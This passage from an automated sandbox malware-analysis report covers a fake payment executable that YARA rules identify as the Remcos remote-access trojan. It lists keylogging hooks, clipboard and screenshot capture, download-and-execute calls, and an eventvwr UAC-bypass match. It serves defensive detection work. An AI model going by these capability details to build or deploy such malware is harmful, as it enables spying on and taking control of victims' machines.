ring@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004050FC OpenClipboard,GetClipboardData,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,13_2_004050FC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040D71E CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,StretchBlt,GetObjectA,LocalAlloc,GlobalAlloc,GetDIBits,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_0040D71E
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_004038DB GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,13_2_004038DB

            E-Banking Fraud

            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1424435810.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3845599217.0000000003010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7948, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 7240, type: MEMORYSTR

            System Summary

            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 9.2.JXHPwNYzysUjKo.exe.38aa420.7.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Remcos in memory Author: JPCERT/CC Incident Response Group
            Source: initial sampleStatic PE information: Filename: e-Payment.NET.CMS4006975815.exe
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c13_2_0040A71E
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_0065D5BC
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C6C84
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C02A0
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C0290
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C1088
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C06D8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_0280D5BC
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A5F30
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A06D8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A27C8
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A1088
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A0290
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A02A0
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: String function: 0040FC1A appears 54 times
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: String function: 0040FCBA appears 34 times
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000000.1364244402.00000000000FE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWkSX.exe6 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.00000000038AE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.00000000026D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1412551435.0000000004E30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1413578810.0000000005770000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1407937775.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe | Binary or memory string: OriginalFilenameWkSX.exe6 vs e-Payment.NET.CMS4006975815.exe
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 9.2.JXHPwNYzysUjKo.exe.38c1440.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3753e08.9.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.373cde8.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 13.2.JXHPwNYzysUjKo.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
